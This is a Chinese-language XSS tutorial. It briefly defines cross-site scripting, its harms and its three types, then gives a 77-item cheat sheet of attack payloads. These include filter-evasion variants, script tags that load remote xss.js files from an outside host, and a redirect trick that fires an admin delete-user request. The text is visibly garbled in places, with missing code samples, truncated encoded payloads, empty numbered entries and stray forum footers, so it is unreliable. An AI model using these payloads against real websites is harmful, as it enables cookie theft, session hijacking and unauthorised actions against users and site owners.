一、什麼是XSS?
XSS全稱是Cross Site Scripting即跨站腳本,當目標網站目標用戶瀏覽器渲染HTML文檔的過程中,出現了不被預期的腳本指令並執行時,XSS就發生了。
這裏我們主要注意四點:1、目標網站目標用戶;2、瀏覽器;3、不被預期;4、腳本。
二、XSS有什麼危害?
當我們知道了什麼是XSS後,也一定很想知道它到底有什麼用,或者有什麼危害,如何防禦。
關於XSS有關危害,我這裏中羅列一段列表,詳細介紹不進行更多的贅述:
- 掛馬
- 盜取用戶Cookie。
- DOS(拒絕服務)客戶端瀏覽器。
- 釣魚攻擊,高級的釣魚技巧。
- 刪除目標文章、惡意篡改數據、嫁禍。
- 劫持用戶Web行爲,甚至進一步滲透內網。
- 爆發Web2.0蠕蟲。
- 蠕蟲式的DDoS攻擊。
- 蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網上數據
- 其它安全問題
三、XSS分類
XSS有三類:反射型XSS(非持久型)、存儲型XSS(持久型)和DOM XSS。
1、反射型XSS
發出請求時,XSS代碼出現在URL中,作爲輸入提交到服務器端,服務器端解析後響應,XSS代碼隨響應內容一起傳回給瀏覽器,最後瀏覽器解析執行XSS代碼。這個過程像一次反射,故叫反射型XSS。
一個簡單的例子:http://www.a.com/xss/reflect.php的代碼如下:
如果輸入x的值未經任何過濾就直接輸出,提交:http://www.foo.com/xss/reflect.php?x=<script>alert(1)</script>
則alert()函數會在瀏覽器觸發。
2、存儲型XSS
存儲型XSS和反射型XSS的差別僅在於,提交的代碼會存儲在服務器端(數據庫,內存,文件系統等),下次請求目標頁面時不用再提交XSS代碼
最典型的例子是留言板XSS,用戶提交一條包含XSS代碼的留言存儲到數據庫,目標用戶查看留言板時,那些留言的內容會從數據庫查詢出來並顯示,瀏覽器發現有XSS代碼,就當做正常的HTML與Js解析執行,於是觸發了XSS攻擊。
3、DOM XSS
DOM XSS和反射型XSS、存儲型XSS的差別在於DOM XSS的代碼並不需要服務器參與,觸發XSS靠的是瀏覽器端的DOM解析,完全是客戶端的事情。http://www.a.com/xss/domxss.html代碼如下:
觸發方式爲:http://www.a.com/xss/domxss.html#alert(1)
這個URL#後的內容是不會發送到服務器端的,僅僅在客戶端被接收並解執行。
常見的輸入點有:
xhr請求回來的數據
表單項的值
常見的輸出點有:
直接輸出html內容,如:
直接修改DOM樹(包括DHTML)如:
替換document URL,如:
打開或修改新窗口,如:
附常見的XSS攻擊方法
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG標籤XSS使用JavaScript命令
<IMG SRC=http://3w.org/XSS/xss.js/>
(3)IMG標籤無分號無引號
<IMG SRC=javascript:alert('XSS')>
(4)IMG標籤大小寫不敏感
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5)HTML編碼(必須有分號)
<IMG SRC=javascript:alert("XSS")>
(6)修正缺陷IMG標籤
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7)formCharCode標籤(計算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode編碼(計算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)
<IMG SRC=jav..省略..S')>
(10)十六進制編碼也是沒有分號(計算器)
<IMG SRC=java..省略..XSS')>
(11)嵌入式標籤,將Javascript分開
<IMG SRC="jav ascript:alert('XSS');">
(12)嵌入式編碼標籤,將Javascript分開
<IMG SRC="jav ascript:alert('XSS');">
(13)嵌入式換行符
<IMG SRC="jav ascript:alert('XSS');">
(14)嵌入式回車
<IMG SRC="jav ascript:alert('XSS');">
(15)嵌入式多行注入JavaScript,這是XSS極端的例子
<IMG SRC="javascript:alert('XSS')">
(16)解決限制字符(要求同頁面)
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
(18)空字符2,空字符在國內基本沒效果.因爲沒有地方可以利用
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19)Spaces和meta前的IMG標籤
<IMG SRC=" javascript:alert('XSS');">
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23)雙開括號
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24)無結束腳本標記(僅火狐等瀏覽器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)無結束腳本標記2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半開的HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27)雙開角括號
<iframe src=http://3w.org/XSS.html <
(28)無單引號 雙引號 分號
(29)換碼過濾的JavaScript
\";alert('XSS');//
(30)結束Title標籤
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31)Input Image
<INPUT SRC="javascript:alert('XSS');">
(32)BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33)BODY標籤
<BODY('XSS')>
(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36)BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38)遠程樣式表
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41)META鏈接url
(42)Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43)Frame
(44)Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45)TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47)DIV background-image後加上額外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48)DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49)STYLE屬性分拆表達
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51)STYLE background-image
(52)IMG STYLE方式
exppression(alert("XSS"))'>
(53)STYLE background
(54)BASE
<BASE HREF="javascript:alert('XSS');//">
(55)EMBED標籤,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56)在flash中使用ActionScrpt可以混進你XSS的代碼
(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上
(58)如果過濾了你的JS你可以在圖片裏添加JS代碼來利用
<SCRIPT SRC=""></SCRIPT>
(59)IMG嵌入式命令,可執行任意命令
<IMG SRC="http://www.a.com/a.php?a=b">
(60)IMG嵌入式命令(a.jpg在同服務器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)繞符號過濾
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
(67)
(68)URL繞行
<A HREF="http://127.0.0.1/">XSS</A>
(69)URL編碼
<A HREF="http://3w.org">XSS</A>
(70)IP十進制
<A HREF="http://3232235521″>XSS</A>
(71)IP十六進制
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八進制
<A HREF="http://0300.0250.0000.0001″>XSS</A>
(73)混合編碼
<A HREF="http://6 6.000146.0×7.147/"">XSS</A>
(74)節省[http:]
<A HREF="//www.google.com/">XSS</A>
(75)節省[www]
<A HREF="http://google.com/">XSS</A>
(76)絕對點絕對DNS
<A HREF="http://www.google.com./">XSS</A>
(77)javascript鏈接
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>